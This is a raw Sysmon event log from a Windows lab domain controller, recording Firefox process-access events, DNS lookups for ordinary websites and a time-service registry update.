Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 13241300x800000000000000017531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:00:19.645{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0x41ae9473) 22542200x800000000000000017530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:18.210{59A5CD1D-945A-6005-3305-00000000A301}7052i.ytimg.com0::ffff:172.217.23.118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.064{59A5CD1D-945A-6005-3305-00000000A301}7052pulsar.g.ebay.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.054{59A5CD1D-945A-6005-3305-00000000A301}7052pulsar.g.ebay.com064.4.253.235;209.140.129.52;209.140.129.67;209.140.129.83;209.140.144.120;209.140.145.48;209.140.147.11;209.140.147.243;209.140.148.139;209.140.148.220;216.113.185.13;64.4.253.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.054{59A5CD1D-945A-6005-3305-00000000A301}7052pulsar.ebay.de0type: 5 pulsar.ebay.com;type: 5 pulsar.g.ebay.com;::ffff:64.4.253.59;::ffff:64.4.253.235;::ffff:209.140.129.52;::ffff:209.140.129.67;::ffff:209.140.129.83;::ffff:209.140.144.120;::ffff:209.140.145.48;::ffff:209.140.147.11;::ffff:209.140.147.243;::ffff:209.140.148.139;::ffff:209.140.148.220;::ffff:216.113.185.13;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.938{59A5CD1D-8E56-6005-2E00-00000000A301}246482.129.140.209.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464240.148.140.209.in-addr.arpa.0type: 12 epage-web-public-1-3-lvsaz02.ebay.com;C:\Windows\sysmon64.exe 22542200x800000000000000017524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.930{59A5CD1D-8E56-6005-2E00-00000000A301}2464202.74.250.142.in-addr.arpa.0type: 12 
fra24s02-in-f10.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.582{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.582{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.547{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.547{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.547{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla 
Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program 
Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.047{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.042{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.038{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.037{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.037{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.004{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.644{59A5CD1D-945A-6005-3305-00000000A301}7052scontent.xx.fbcdn.net0157.240.20.19;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.643{59A5CD1D-945A-6005-3305-00000000A301}7052facebook.com0::ffff:157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.643{59A5CD1D-945A-6005-3305-00000000A301}7052static.xx.fbcdn.net0type: 5 scontent.xx.fbcdn.net;::ffff:157.240.20.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.484{59A5CD1D-945A-6005-3305-00000000A301}7052www.businessinsider.de02606:4700:10::6816:429a;2606:4700:10::6816:439a;2606:4700:10::ac43:1d74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.481{59A5CD1D-945A-6005-3305-00000000A301}7052www.businessinsider.de0172.67.29.116;104.22.66.154;104.22.67.154;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.480{59A5CD1D-945A-6005-3305-00000000A301}7052www.businessinsider.de0::ffff:104.22.67.154;::ffff:172.67.29.116;::ffff:104.22.66.154;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464118.23.217.172.in-addr.arpa.0type: 12 mil04s23-in-f22.1e100.net;type: 12 mil04s23-in-f118.1e100.net;type: 12 fra16s45-in-f22.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}246474.207.58.216.in-addr.arpa.0type: 12 fra16s25-in-f10.1e100.net;C:\Windows\sysmon64.exe 
